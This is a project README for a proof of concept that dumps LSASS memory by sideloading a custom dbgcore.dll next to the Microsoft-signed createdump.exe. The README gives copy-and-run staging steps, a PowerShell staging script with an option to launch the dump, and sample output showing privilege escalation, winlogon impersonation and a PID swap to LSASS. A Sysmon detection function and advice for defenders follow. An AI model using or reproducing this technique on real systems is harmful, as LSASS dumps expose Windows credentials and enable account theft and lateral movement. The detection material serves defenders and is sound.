This project demonstrates how to dump the LSASS process with createdump.exe, a Microsoft-signed executable shipped with the Windows 365 app ("Windows App"), by sideloading a custom dbgcore.dll next to it. The DLL hooks OpenProcess and MiniDumpWriteDump, enables SeDebugPrivilege, impersonates winlogon, and swaps the target PID for that of LSASS, so the signed binary ends up writing an LSASS minidump.
Get-AuthenticodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')
Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc
SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe
- Copy createdump.exe from the WindowsApps folder to a folder of your choice:
  copy "C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe" .
- Place dbgcore.dll from this repo in the same folder.
- Execute createdump.exe (optionally provide parameters).
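The staging steps above as one script, added here as an example (it is not part of the original project). It locates createdump.exe inside the Windows 365 package, copies it beside the DLL, and records the signer of every file that will be involved before anything is launched. The `$SideloadDll` path and the `createdump-stage` directory name are assumptions; the script assumes the Windows 365 app is installed and that the current user can read its package directory.

```powershell
# Added example, not part of the original project: stage createdump.exe next to a
# dbgcore.dll and record who signed each file before running anything.
# Assumptions: the Windows 365 app is installed, the current user can read the
# package directory, and $SideloadDll points to the DLL from this repo.
param(
    [string]$StageDir    = (Join-Path $env:TEMP 'createdump-stage'),
    [string]$SideloadDll = '.\dbgcore.dll',   # hypothetical location of the repo's DLL
    [switch]$Run                              # actually launch createdump.exe at the end
)

$pkg = Get-AppxPackage -Name '*Windows365*' | Select-Object -First 1
if (-not $pkg) { throw 'Windows 365 app package (MicrosoftCorporationII.Windows365) not found' }

$src = Join-Path -Path $pkg.InstallLocation -ChildPath 'wnc\createdump.exe'
if (-not (Test-Path -LiteralPath $src)) { throw "createdump.exe not found at $src" }

New-Item -ItemType Directory -Force -Path $StageDir | Out-Null
Copy-Item -LiteralPath $src         -Destination (Join-Path $StageDir 'createdump.exe') -Force
Copy-Item -LiteralPath $SideloadDll -Destination (Join-Path $StageDir 'dbgcore.dll')    -Force

# createdump.exe resolves dbgcore.dll through the normal loader search order. With
# SafeDllSearchMode (the default) the application directory is searched before
# System32, and dbgcore.dll is not a KnownDLL, so the staged copy is the one loaded.
$files = @(
    (Join-Path $StageDir 'createdump.exe'),
    (Join-Path $StageDir 'dbgcore.dll'),
    (Join-Path $env:SystemRoot 'System32\dbgcore.dll')
)
$sigs = Get-AuthenticodeSignature -FilePath $files
$sigs | Select-Object @{n='File'; e={ $_.Path }},
                      Status,
                      @{n='Signer'; e={ if ($_.SignerCertificate) { $_.SignerCertificate.Subject } else { '(unsigned)' } }},
                      @{n='Thumbprint'; e={ if ($_.SignerCertificate) { $_.SignerCertificate.Thumbprint } }} |
        Format-Table -AutoSize -Wrap

# Only a validly signed host binary is interesting here: the point of the PoC is that
# the process opening LSASS is a Microsoft-signed executable, while the DLL it loads
# from its own directory carries whatever signature (or none) you gave it.
$hostSig = $sigs | Where-Object Path -like '*\createdump.exe'
if ($hostSig.Status -ne 'Valid') { throw "staged createdump.exe signature status is $($hostSig.Status)" }

if ($Run) {
    & (Join-Path $StageDir 'createdump.exe')
}
```

Run it without `-Run` first to see the three signature rows side by side: the staged createdump.exe and the System32 dbgcore.dll are Microsoft-signed, the staged dbgcore.dll is not, and that mismatch between a trusted host and the DLL it loads from its own directory is exactly what a defender should be looking for.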
Output should be something like this:
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump
Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
ProcessId: 35828
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
ProcessId: 1512
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.
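The output above leaves two traces a defender can hunt for: a copy of createdump.exe running outside the WindowsApps package directory, and a dbgcore.dll that is not the System32 one sitting in the call stack of the process that opened LSASS. The following is an added detection example, not part of the original project. It assumes Sysmon is installed with ProcessAccess (Event ID 10) logging enabled for lsass.exe and that the caller can read the Microsoft-Windows-Sysmon/Operational log; the function name and the one-day lookback are assumptions.

```powershell
# Added detection example, not from the original project: find Sysmon ProcessAccess
# events (Event ID 10) in which a createdump.exe opened lsass.exe, and report whether
# the source binary lives outside the Appx package and whether a non-System32
# dbgcore.dll appears in the call trace.
# Assumes Sysmon with ProcessAccess logging for lsass.exe and read access to the log.
function Get-LsassAccessByCreatedump {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),          # assumed lookback window
        [string]$SourceImagePattern = '\\createdump\.exe$'
    )
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $Since }
    foreach ($evt in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # Flatten the EventData <Data Name="..."> nodes into a hashtable.
        $data = @{}
        foreach ($d in ([xml]$evt.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($data.TargetImage -notmatch '\\lsass\.exe$')      { continue }
        if ($data.SourceImage -notmatch $SourceImagePattern)  { continue }

        # Sysmon's CallTrace is a '|'-separated list of "module+offset" entries.
        # A dbgcore.dll that is not under System32 is the sideloaded proxy DLL.
        $sideloaded = [regex]::Matches($data.CallTrace, '(?i)[A-Z]:\\[^|]*?dbgcore\.dll') |
            ForEach-Object { $_.Value } |
            Where-Object { $_ -notlike "$env:SystemRoot\System32\*" }

        [pscustomobject]@{
            Time          = $evt.TimeCreated
            SourceImage   = $data.SourceImage
            SourcePid     = $data.SourceProcessId
            TargetPid     = $data.TargetProcessId
            GrantedAccess = $data.GrantedAccess
            OutsideAppx   = ($data.SourceImage -notlike "$env:ProgramFiles\WindowsApps\*")
            SideloadedDll = ($sideloaded -join ';')
        }
    }
}

Get-LsassAccessByCreatedump | Format-Table -AutoSize -Wrap
```

A hit with OutsideAppx set to True, or with a non-empty SideloadedDll column, matches the run shown above (createdump.exe launched from c:\work\_createdump, loading a dbgcore.dll from that same folder). Check the GrantedAccess column against your Sysmon configuration: many rulesets only log lsass.exe access for a fixed list of access masks, and an event filtered out at collection time cannot be found here.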
This project is intended for educational purposes only. Misuse of this tool could violate privacy and security policies.